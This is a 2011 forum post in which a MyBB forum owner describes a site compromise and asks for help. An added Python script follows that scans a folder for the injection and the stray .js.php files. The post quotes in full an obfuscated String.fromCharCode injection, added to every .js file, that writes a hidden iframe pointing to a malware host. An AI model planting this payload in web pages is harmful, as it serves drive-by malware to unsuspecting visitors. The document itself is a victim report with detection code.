2011-12-13, 02:15 PM
Hi...
My forum is getting compromised... please help me..
I'm a new user of MyBB and I'm using the latest version (v1.6.5)
Just recently I opened my site at using Google Chrome..
But then the browser displayed a warning message as follows:
(quote)
forum.myforumname.com contains content from brunno.in, a site known to distribute malware. Your computer might catch a virus if you visit this site.
(/quote)
My Avira Internet Security Suite 2012 also displayed a warning message that malware was found at http://forum.myforumname.com/jscripts/somefile.js
so I opened that file and found suspicious code:
(quote)
if (undefined === window.dbaaccddcbe) document.write(String.fromCharCode(60,105,102,114,97,109,101,32,102,114,97,109,101,98,111,114,100,101,114,61,34,48,34,32,119,105,100,116,104,61,34,49,48,34,32,104,101,105,103,104,116,61,34,49,48,34,32,115,114,99,61,34,104,116,116,112,58,47,47,98,114,117,110,110,111,46,105,110,47,115,104,111,119,116,104,114,101,97,100,46,112,104,112,63,116,61,51,55,50,50,48,51,51,56,34,62,60,47,105,102,114,97,109,101,62)); var dbaaccddcbe = true;
(/quote)
Also, I found out that all .js files had also been injected with that code.
That's not all: still in the same folder, each .js file is duplicated with a filename.js.php extension that contains gzinflate64 code. I tried to decode that code but failed. But at the end of that code, there is something that I'm very familiar with: my cPanel username and password for FTP login.
So far, I deleted those suspicious files and code, and I also updated/changed my cPanel password.
But I still worry that if the security hole still exists, the hacker may try a similar method.
Please help me harden my forum's security...
Thanks..
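Added example (not part of the original post, and not MyBB code): a read-only triage script for the two artefacts the post describes, the `document.write(String.fromCharCode(...))` line appended to .js files and the `filename.js.php` copies beside them. The sample tree, the placeholder host `malware.example.invalid` and the function names are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# document.write(String.fromCharCode(60,105,...)) as in the line quoted in the post
CHARCODE_WRITE = re.compile(
    r"document\.write\(\s*String\.fromCharCode\(([\d\s,]+)\)\s*\)")
IFRAME_SRC = re.compile(r"<iframe\b[^>]*\bsrc\s*=\s*[\"']([^\"']+)", re.I)

# Constructed sample: placeholder host, same shape as the injected line.
SAMPLE_HTML = ('<iframe frameborder="0" width="10" height="10" '
               'src="http://malware.example.invalid/x.php?t=1"></iframe>')
SAMPLE_JS = ("var ok = 1;\nif (undefined === window.abc) document.write("
             "String.fromCharCode(%s)); var abc = true;\n"
             % ",".join(str(ord(c)) for c in SAMPLE_HTML))

def decode_injections(js_text):
    """Decode each char-code document.write; return (markup, iframe src or None)."""
    found = []
    for match in CHARCODE_WRITE.finditer(js_text):
        try:
            markup = "".join(chr(int(n)) for n in match.group(1).split(",") if n.strip())
        except ValueError:  # malformed number or out-of-range code point
            continue
        src = IFRAME_SRC.search(markup)
        found.append((markup, src.group(1) if src else None))
    return found

def scan_tree(root):
    """Report injected .js files and files named like the post's *.js.php copies."""
    report = {"injected": {}, "js_php": []}
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        if path.name.lower().endswith(".js.php"):
            report["js_php"].append(rel)
        elif path.suffix.lower() == ".js":
            hits = decode_injections(path.read_text(errors="replace"))
            if hits:
                report["injected"][rel] = [src for _, src in hits]
    return report

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:  # constructed tree, not real data
        Path(tmp, "clean.js").write_text("var ok = 1;\n")
        Path(tmp, "general.js").write_text(SAMPLE_JS)
        Path(tmp, "general.js.php").write_text("<?php /* placeholder */ ?>")
        print(scan_tree(tmp))
```

Point `scan_tree` at the forum's `jscripts` folder; it only reads files and changes nothing.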